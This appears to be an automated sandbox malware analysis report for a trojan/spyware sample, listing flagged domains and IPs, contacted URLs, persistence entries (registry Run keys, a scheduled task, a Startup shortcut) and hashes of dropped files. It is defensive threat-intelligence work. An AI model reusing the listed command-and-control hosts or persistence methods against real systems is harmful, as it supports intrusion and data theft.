C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches
Source | Detection | Scanner | Label
deoci.biz | 15% | Virustotal |
nqwjmb.biz | 14% | Virustotal |
wllvnzb.biz | 14% | Virustotal |
dwrqljrr.biz | 16% | Virustotal |
                    No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                                                                                                              acwjcqqv.biz
                                                                                                                              18.141.10.107
                                                                                                                              truetrue
                                                                                                                                jdhhbs.biz
                                                                                                                                13.251.16.150
                                                                                                                                truefalse
                                                                                                                                  anpmnmxo.biz
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    zjbpaao.biz
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      uhxqin.biz
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        zlenh.biz
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          lejtdj.biz
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
Name                                    | Malicious
http://bumxkqgxu.biz/ifsivywgpp         | false
http://warkcdu.biz/kc                   | true
http://acwjcqqv.biz/ljnnvokac           | true
http://ytctnunms.biz/anxrplnvdvpxn      | false
http://gnqgo.biz/torfbleb               | false
http://vcddkls.biz/udjkgjnyfcxmpggx     | true
http://yhqqc.biz/binfxyplqyoumy         | false
http://dlynankz.biz/fuqbdfcow           | false
http://lpuegx.biz/nbnssijhjwmugla       | true
http://xccjj.biz/rntyad                 | true
http://yhqqc.biz/tgphsmbcvwmuwmj        | false
http://sxmiywsfv.biz/vtk                | false
http://fwiwk.biz/opshcknhcx             | false
http://xlfhhhm.biz/ijfjro               | false
http://gcedd.biz/onutm                  | false
http://tbjrpv.biz/cmdgaowb              | false
http://qpnczch.biz/h                    | true
http://yunalwv.biz/sltbypkjutmqd        | false
http://rynmcq.biz/qqnj                  | true
http://yauexmxk.biz/dqpygue             | false
http://lpuegx.biz/ccx                   | true
http://saytjshyf.biz/hdfj               | false
http://gvijgjwkh.biz/txfroxnfrj         | false
http://gytujflc.biz/mqrfuyvbhtbn        | false
http://gnqgo.biz/twv                    | false
http://saytjshyf.biz/wt                 | false
http://xlfhhhm.biz/ihrtfcsj             | false
http://esuzf.biz/vj                     | false
http://knjghuig.biz/wofnqkoxvbvigg      | true
http://yunalwv.biz/iqacwcupavovv        | false
http://jdhhbs.biz/b                     | false
http://deoci.biz/dvsybtnikly            | false
http://myups.biz/omaxykiwlg             | false
http://vcddkls.biz/wxdopk               | true
http://vrrazpdh.biz/wmyvrothcg          | false
http://vjaxhpbji.biz/pgakntaoep         | true
http://ftxlah.biz/ubrpiugbci            | false
http://mnjmhp.biz/dqxhnesyyna           | false
http://przvgke.biz/fafj                 | false
http://oshhkdluh.biz/mvjuawquor         | true
http://lpuegx.biz/hpkejgwwxdp           | true
http://ifsaia.biz/kqhlsuvr              | false
http://gvijgjwkh.biz/y                  | false
http://typgfhb.biz/yfqsba               | false
http://yauexmxk.biz/negfyndqat          | false
https://gxe0.com/yak2/233_Juqmtmyadyy   | true
http://przvgke.biz/kgrfegimyutt         | false
http://pywolwnvd.biz/tkvpxcpexicoa      | true
http://wllvnzb.biz/gerofbpnhxbnel       | true
http://ssbzmoy.biz/bmgwtyy              | true
http://mgmsclkyu.biz/t                  | false
http://ytctnunms.biz/qkmbmbtlinurxa     | false
https://api.ipify.org/                  | false
http://gytujflc.biz/mhnfavogqkp         | false
http://deoci.biz/tipcpxgs               | false
http://vrrazpdh.biz/jsmhknoucgib        | false
http://brsua.biz/dgxlfefuhlec           | false
http://oflybfv.biz/dafungtde            | false
http://vjaxhpbji.biz/dhyyqtllpdwr       | true
http://qaynky.biz/fqwxf                 | false
http://hehckyov.biz/isfkmckm            | false
http://bumxkqgxu.biz/xqvmg              | false
http://acwjcqqv.biz/rmu                 | true
http://gcedd.biz/rw                     | false
Name | Source | Malicious
http://172.234.222.143/mbuec | Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp | false
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp | false
http://18.141.10.107/nkbiquv | Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp | false
http://82.112.184.197/a | alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp | false
http://82.112.184.197/d | alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp | false
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp | false
http://18.141.10.107/1 | Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007FC000.00000004.00000020.00020000.00000000.sdmp | false
http://82.112.184.197/s | alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp | false
http://172.234.222.143/kgrfegimyutt~ | Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp | false
http://172.234.2I | Native_neworigin.exe, 0000000D.00000002.1778812791.00000000053C4000.00000004.00000020.00020000.00000000.sdmp | false
https://nuget.org/nuget.exe | powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp | false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | false
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp | false
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp | false
http://82.112.184.197:80/btnkoeanfymxsstkbat | alg.exe, 00000011.00000003.2641931350.0000000000659000.00000004.00000020.00020000.00000000.sdmp | false
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1 | alg.exe, 00000011.00000003.2537698906.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp | false
https://contoso.com/Icon | powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp | false
https://api.ipify.org/t | Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | false
https://github.com/Pester/Pester | powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp | false
http://18.141.10.107/qmpyC | Native_neworigin.exe, 0000000D.00000002.1667563278.000000000077A000.00000004.00000020.00020000.00000000.sdmp | false
http://r11.i.lencr.org/0 | Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp | false
http://18.141.10.107/aatpwqmmnwrfjm | alg.exe, 00000011.00000003.1712152929.0000000000678000.00000004.00000020.00020000.00000000.sdmp | false
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp | false
http://82.112.184.197/hrkmkab | alg.exe, 00000011.00000003.2633384477.0000000000678000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2410341370.0000000000676000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2177399665.0000000000678000.00000004.00000020.00020000.00000000.sdmp | false
http://www.pmail.com | C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.00000000209D0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1540095281.0000000021EA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021B3B000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1576898183.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 0000000B.00000000.1440342602.0000000000416000.00000002.00000001.01000000.00000007.sdmp | false
http://r11.o.le | Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp | false
http://ocsp.sectigo.com0 | C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp | false
                                                                                                                                                                                                                                                                                                                                  http://18.141.10.107:80/qmpy/Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                    http://knjghuig.biz/Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                      http://54.244.188.177/ulvxycyjutwdmypqalg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                        http://54.244.188.177:80/sqxdgegqjrgdpvialg.exe, 00000011.00000003.1589672551.000000000065D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                            http://x1.c.lencr.org/0Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                              http://x1.i.lencr.org/0Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                http://www.autoitscript.com/autoit3/8alg.exe, 00000011.00000003.2668324932.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2653910451.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                  http://54.244.188.177/alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
165.160.15.20 | myups.biz | United States | 19574 | CSCUS | false
3.254.94.185 | uaafd.biz | United States | 16509 | AMAZON-02US | false
3.94.10.34 | ytctnunms.biz | United States | 14618 | AMAZON-AESUS | false
34.246.200.160 | tbjrpv.biz | United States | 16509 | AMAZON-02US | false
198.252.105.91 | gxe0.com | Canada | 20068 | HAWKHOSTCA | true
172.234.222.143 | przvgke.biz | United States | 20940 | AKAMAI-ASN1EU | false
18.208.156.248 | gnqgo.biz | United States | 14618 | AMAZON-AESUS | false
34.211.97.45 | vrrazpdh.biz | United States | 16509 | AMAZON-02US | false
208.100.26.245 | gytujflc.biz | United States | 32748 | STEADFASTUS | false
35.164.78.200 | nqwjmb.biz | United States | 16509 | AMAZON-02US | false
172.234.222.138 | fwiwk.biz | United States | 20940 | AKAMAI-ASN1EU | false
51.195.88.199 | s82.gocheapweb.com | France | 16276 | OVHFR | true
44.221.84.105 | hehckyov.biz | United States | 14618 | AMAZON-AESUS | false
85.214.228.140 | dlynankz.biz | Germany | 6724 | STRATOSTRATOAGDE | false
54.244.188.177 | pywolwnvd.biz | United States | 16509 | AMAZON-02US | true
13.251.16.150 | sxmiywsfv.biz | United States | 16509 | AMAZON-02US | false
47.129.31.212 | xlfhhhm.biz | Canada | 34533 | ESAMARA-ASRU | false
18.246.231.120 | vyome.biz | United States | 16509 | AMAZON-02US | true
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
82.112.184.197 | vjaxhpbji.biz | Russian Federation | 43267 | FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU | true
18.141.10.107 | warkcdu.biz | United States | 16509 | AMAZON-02US | true

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562865
Start date and time: 2024-11-26 08:11:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 44
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: C6dAUcOA6M.exe
renamed because original name is a hash value
Original Sample Name: 0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.evad.winEXE@59/159@135/22
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 83
• Number of non-executed functions: 179
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Trading_AIBot.exe, PID 2112 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:12:08 | API Interceptor | 2x Sleep call for process: C6dAUcOA6M.exe modified
02:12:28 | API Interceptor | 3531569x Sleep call for process: Native_neworigin.exe modified
02:12:29 | API Interceptor | 27x Sleep call for process: powershell.exe modified
02:12:30 | API Interceptor | 61x Sleep call for process: alg.exe modified
02:12:37 | API Interceptor | 2x Sleep call for process: Juqmtmya.PIF modified
02:12:38 | API Interceptor | 16x Sleep call for process: aymtmquJ.pif modified
02:13:17 | API Interceptor | 1279724x Sleep call for process: apihost.exe modified
08:12:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
08:12:28 | Task Scheduler | Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
08:12:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
08:12:47 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
No context
Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1353216
Entropy (8bit): 5.324385552269216
Encrypted: false
SSDEEP: 12288:iC4VQjGARQNhiEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:iOCAR0iEsqjnhMgeiCl7G0nehbGZpbD
MD5: DFE1607CB39760308AC48379A10829AB
SHA1: 048B3618187DE7A7EF63A4E001B9BA0F10554E75
SHA-256: ADF31A8B6B4718F31C0F2D9022F9686B8E306CF1BA7DFE32537C3E98D26CC4D2
SHA-512: C9A45C490451F22181C3BC9503F76A238985A043855BC80EDD1B2787AE280B3D2A9E157EA23B73298C6FBC3115BD5CD460B78798A99F58ECDBE47F7272F1A453
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1294848
Entropy (8bit):5.2826902117364805
Encrypted:false
SSDEEP:12288:9NUpaKghnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9CMKghsqjnhMgeiCl7G0nehbGZpbD
MD5:86738F12220919378353F23229B3AF5D
SHA1:AFAFF69191B077DB08E25C36F9ADDE9D1AF1B808
SHA-256:300242A91DA6A65CBF31A4A08740F7F931290EF33844F4C13ACD5259009DCE52
SHA-512:2DC928919F3FF222D67DFE8EF63E28326833DEF223E4C431055D0B15C2CEF3163A145A2006580A4EE12C5BDD02AB945146165B5970C34A5322AA6E01481F74E3
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1314304
Entropy (8bit):5.274137182829345
Encrypted:false
SSDEEP:12288:VMEhwdbToXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:TKdHosqjnhMgeiCl7G0nehbGZpbD
MD5:10D77573DF2C4EBCC9020AF28F430B43
SHA1:1AD3C6200B8EEBE354687725096CFA2FC940E892
SHA-256:44BC43B98BE8BCC3D4AB28E4881AA661695906B2A7C9768E4FD71DF319544CA7
SHA-512:7DF4C732BD661A46BDF3DD954F3E3FB2866B27E9EBA1E2BF22041DD6D92CB9F601B4482FC27B300D359BD01039D46F54CF0AEA600871090A0B053E5D449B3F27
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2203136
Entropy (8bit):7.647031955361552
Encrypted:false
SSDEEP:49152:oK0eqkSR7Xgo4TiRPnLWvJsDmg27RnWGj:oK0pR7Xn4TiRCvJsD527BWG
MD5:3F6B2D875C9F894541659E9CFBCA65BB
SHA1:0EB6399EF9688E2322007E553546239AAF8C5087
SHA-256:048703B20684B049B7A53D06CBC638151E9AF5A8CCF65ACFE1D111CE103CABB1
SHA-512:9736D568932737B08506B7EB2779161C4770E538B5F09A5A1A190E906B26452EABCC4B03773D1826CDBA3D925FE4A79022121FE42A11CBE84791596E0F98A8FC
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2369024
Entropy (8bit):7.565059226286503
Encrypted:false
SSDEEP:49152:EfYP1JsEDkSR7Xgo4TiRPnLWvJsDmg27RnWGj:kYPBR7Xn4TiRCvJsD527BWG
MD5:D8FB26AFE9F458B6CD8BB05771B90100
SHA1:317E6469ADAEEA8E23587446F86DDD3ED86222BA
SHA-256:0298E1BDDB319A411C2FB35399150DDE66FCA52AD26555ED5601150C67DCB4DC
SHA-512:9FFA04D4C3559015DC82E371BF3DEC82E42CDE09BC25E7180BDC701F3A6CDCEB1D0A28249514DC88B7EF8F9EA0EF540C99CF82F7519A2849ABBA0BC8C7D4DC74
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1245184
Entropy (8bit):5.123559105076108
Encrypted:false
SSDEEP:12288:t62SYUcknnGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:qYUcknGsqjnhMgeiCl7G0nehbGZpbD
MD5:44BF8C231445C1790C896B524ADA4791
SHA1:75E2D343ECDDF31A790B1A419FE25BBDC350DFCD
SHA-256:F5BCD4A94F81E8AC79454FBF7F0D86C6BFFB48C9514EA7CFD4F576768BF5F1A8
SHA-512:53B04A0849DE464F9829D626FE48EAF236731E226A52A37513A0653DCCF585112113A1940B3F49EA2127613CA6AE7C7E7083BD0E34BD588C8263D8AC6148D4C5
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1640448
Entropy (8bit):7.1666764388587305
Encrypted:false
SSDEEP:49152:D+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaS4Dmg27RnWGj:BSktbpKD527BWG
MD5:B14D969182F37785DD3DA8BBE5C4BBB2
SHA1:0D92322782A2F12FB4A045978456D8F160E9AC97
SHA-256:1E4DCAFB2FE18A96D560376661751BDDB7F5B5B3234AEBA13604BDB9E3E71139
SHA-512:8FB79C43F578F5572366B781F9AD3D83545C51C5142F7F41296CDC9E42E37712BAA1104DF8C6291D590CD2D3131DA8BB04B404E26A9EEF31250D765C06B70176
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2953728
Entropy (8bit):7.094629348201209
Encrypted:false
SSDEEP:49152:pGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLTDmg27RnWGj:94OEtwiICvYMRfzD527BWG
MD5:C8BBE9C500A2AC4CE28AAD8C47479357
SHA1:7645E76959C42B2A44BA0DA9791957C87B17A491
SHA-256:E39B2F876674F93EC2185F49589D185143760035E2FC64FFA9778F9687C1F55A
SHA-512:F13EE108E648BBCBABBD3E0EAEEB2BA6657C012E8649EF0A68910E176859678C3B4C024D63BF5B8FC47858CAA9CC60F9FE3D00A8E7E4155FF470ACFC6BD14908
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1485824
Entropy (8bit):5.496395069430254
Encrypted:false
SSDEEP:24576:nAMuR+3kMbVjh0sqjnhMgeiCl7G0nehbGZpbD:AD+lbVjhQDmg27RnWGj
MD5:982948B9C93B67785D34AD3B07EE784D
SHA1:3DD7D2D66956FB873E9093A2EBF8E09D315BF0AE
SHA-256:814ECACDFF689B4AAA5E7D12BF1F0511E2346445DE40FF0FDA3CDD380229B7AE
SHA-512:5C6A76C50655AD3EB0170477E29FA060BED2BB9C7DEB28FA74E5C9D3ECD1E1AB5E49461CAE2C3D0A6E4316225AB0353E6669575EB31FF6EA342820489E729719
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\aymtmquJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1290240
Entropy (8bit):5.277732219235477
Encrypted:false
SSDEEP:12288:mImGUcsvZZdubv7hfl3HXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlXsqjnhMgeiCl7G0nehbGZpbD
MD5:110DF16BED4BDADFF4170610718DE9AE
SHA1:10F045A39A965659AD857FB9748A50EEF732EBA4
SHA-256:F72455275ADDC5EA08C757797384309A26BEAB911FFD22C3FCD51515096C25CD
SHA-512:77C76A1621D126FE32E04292871E0690A6CF3A7F614F0F22D44A4E629340E134258489D2CBFCD29CAC4BBAB69266312FFFDA715C1C2DE97E6F338E7EBE92AF69
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1644544
Entropy (8bit): 5.694810873385791
Encrypted: false
SSDEEP: 24576:80vHyeLj8trn3wsWsqjnhMgeiCl7G0nehbGZpbD:ttj4rgsaDmg27RnWGj
MD5: 7B2C922C022404C1B934FC49F8DAF8D9
SHA1: 7FCCF7B770EECAA4036298E263FF498762DD1948
SHA-256: 9693251C09534103A7CDAAEC35693378812E96CF9CBA28D9FCA05D1A217D288C
SHA-512: CA21B62FC1F81436D09D55D7C63BAFF6454E010841246053EA841D22402C22AABD845AF28D54DBAE4E4E42657262F3C63A5E2936258806294AABCFFB25BAFDD0
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1781760
Entropy (8bit): 7.279680201930567
Encrypted: false
SSDEEP: 24576:WoMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/Z/sqjnhMgeiCl7G0nehbGZpv:D4i0wGJra0uAUfkVy7/ZjDmg27RnWGj
MD5: 63C14E9D4BE618E858AFDC572739F79B
